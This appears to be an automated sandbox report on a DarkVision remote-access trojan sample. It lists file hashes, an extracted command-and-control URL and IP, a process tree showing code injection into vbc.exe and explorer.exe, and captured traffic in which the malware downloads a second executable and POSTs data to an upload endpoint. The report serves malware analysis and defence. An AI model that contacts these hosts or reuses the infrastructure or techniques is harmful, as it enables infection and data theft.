Resubmissions

25/11/2024, 20:05 UTC

241125-yts4hatnbw 10

19/11/2024, 09:15 UTC

241119-k7462aykbj 10

Analysis

  • max time kernel
    61s
  • max time network
    61s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/11/2024, 20:05 UTC

General

  • Target

    d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe

  • Size

    1.1MB

  • MD5

    4c99b8a6627bee05a1de8d9061631551

  • SHA1

    4cb8a13eb146431ee6d45d4b8daab7088e9ae5c2

  • SHA256

    d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6

  • SHA512

    a17a604f3eda7d04dff453ebe3548b25e43c1fe9f0cd9702a75c20cd87ad16adafb1d3edae8f8c886a1b81173a4fbbdec7d5fd009feb3869701e9cb170756b42

  • SSDEEP

    24576:BftC16YGW3ad7jWpZAgcteeJp5uXirVpVwL03E+g1RRN9wVQ:BfYhwd7jkAgc1BrVrPEtRd

Score
10/10

Malware Config

Extracted

Family

darkvision

C2

http://fiestagrandefm.com/ss/upload.php

85.209.133.9

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Downloads MZ/PE file
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe
    "C:\Users\Admin\AppData\Local\Temp\d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      2⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\EXPLORER.EXE
        C:\Windows\EXPLORER.EXE {F34EC6D1-895B-4806-959C-01B8FEAFF719}
        3⤵
          PID:4812

    Network

    • flag-us
      DNS
      240.221.184.93.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.221.184.93.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      104.219.191.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.219.191.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      71.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      71.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      fiestagrandefm.com
      EXPLORER.EXE
      Remote address:
      8.8.8.8:53
      Request
      fiestagrandefm.com
      IN A
      Response
      fiestagrandefm.com
      IN A
      144.217.96.196
    • flag-ca
      GET
      http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE
      vbc.exe
      Remote address:
      144.217.96.196:80
      Request
      GET /ss/PASSWORDRECOVERY64EXE.EXE HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Host: fiestagrandefm.com
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:29 GMT
      Server: Apache
      Last-Modified: Sun, 17 Nov 2024 04:49:50 GMT
      Accept-Ranges: bytes
      Content-Length: 1021952
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
    • flag-us
      DNS
      196.96.217.144.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.96.217.144.in-addr.arpa
      IN PTR
      Response
      196.96.217.144.in-addr.arpa
      IN PTR
      r1a1centernet
    • flag-us
      DNS
      9.133.209.85.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.133.209.85.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      9.133.209.85.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.133.209.85.in-addr.arpa
      IN PTR
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 419
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:39 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 414
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 538
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 533
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      107.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.12.20.2.in-addr.arpa
      IN PTR
      Response
      107.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-107.deploy.static.akamaitechnologies.com
    • 144.217.96.196:80
      http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE
      http
      vbc.exe
      29.1kB
      1.1MB
      547
      761

      HTTP Request

      GET http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE

      HTTP Response

      200
    • 85.209.133.9:1994
      vbc.exe
      5.8kB
      268 B
      18
      6
    • 144.217.96.196:80
      http://fiestagrandefm.com/ss/upload.php
      http
      EXPLORER.EXE
      4.6kB
      2.0kB
      23
      16

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200
    • 85.209.133.9:1994
      vbc.exe
      4.3kB
      1.9kB
      47
      43
    • 85.209.133.9:1994
      vbc.exe
      104 B
      2
    • 85.209.133.9:1994
      vbc.exe
      286 B
      140 B
      5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
      140 B
      5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
      140 B
      5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
      140 B
      5
      3
    • 85.209.133.9:1994
      vbc.exe
      338 B
      140 B
      6
      3
    • 8.8.8.8:53
      240.221.184.93.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      240.221.184.93.in-addr.arpa

    • 8.8.8.8:53
      104.219.191.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      104.219.191.52.in-addr.arpa

    • 8.8.8.8:53
      71.31.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      71.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      fiestagrandefm.com
      dns
      EXPLORER.EXE
      64 B
      80 B
      1
      1

      DNS Request

      fiestagrandefm.com

      DNS Response

      144.217.96.196

    • 8.8.8.8:53
      196.96.217.144.in-addr.arpa
      dns
      73 B
      102 B
      1
      1

      DNS Request

      196.96.217.144.in-addr.arpa

    • 8.8.8.8:53
      9.133.209.85.in-addr.arpa
      dns
      142 B
      131 B
      2
      1

      DNS Request

      9.133.209.85.in-addr.arpa

      DNS Request

      9.133.209.85.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      107.12.20.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      107.12.20.2.in-addr.arpa

    • 8.8.8.8:53

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/1180-8-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-34-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-33-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-30-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-13-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-14-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-12-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/1180-10-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

    • memory/4332-5-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

    • memory/4332-7-0x000002643B120000-0x000002643B1D8000-memory.dmp

      Filesize

      736KB

    • memory/4332-6-0x0000026420400000-0x0000026420414000-memory.dmp

      Filesize

      80KB

    • memory/4332-0-0x00007FFCC7F03000-0x00007FFCC7F05000-memory.dmp

      Filesize

      8KB

    • memory/4332-15-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

    • memory/4332-4-0x00007FFCC7F03000-0x00007FFCC7F05000-memory.dmp

      Filesize

      8KB

    • memory/4332-3-0x00000264203D0000-0x00000264203F6000-memory.dmp

      Filesize

      152KB

    • memory/4332-2-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

    • memory/4332-1-0x000002641FD20000-0x000002641FE3A000-memory.dmp

      Filesize

      1.1MB

    • memory/4812-16-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

      Filesize

      4KB

    • memory/4812-17-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB

    • memory/4812-23-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB

    • memory/4812-32-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB
